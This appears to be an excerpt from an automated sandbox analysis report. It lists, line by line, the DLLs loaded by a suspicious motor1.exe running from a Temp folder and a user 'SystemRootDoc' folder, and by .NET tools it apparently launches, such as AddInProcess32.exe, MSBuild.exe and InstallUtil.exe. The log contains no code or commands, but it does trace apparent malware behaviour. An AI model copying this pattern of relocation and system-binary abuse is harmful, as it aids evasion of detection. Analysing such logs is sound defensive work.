Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndcrashhandler.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndnetworking.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndstring.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndapplocations.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndfilesystem.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndos.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndstring.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndexception.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndtime.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: cpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndhash.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndpointer.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndexception.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndversion.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: glog.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: boost_filesystem-mt-x64.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: webuid.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndcrashhandler.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndnetworking.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: d2d1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndnetworking.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndapplocations.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndfilesystem.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndos.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndexception.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: version.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndtime.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: cpr.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndfilesystem.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndexception.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndversion.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: version.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndhash.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: fndpointer.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: boost_filesystem-mt-x64.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
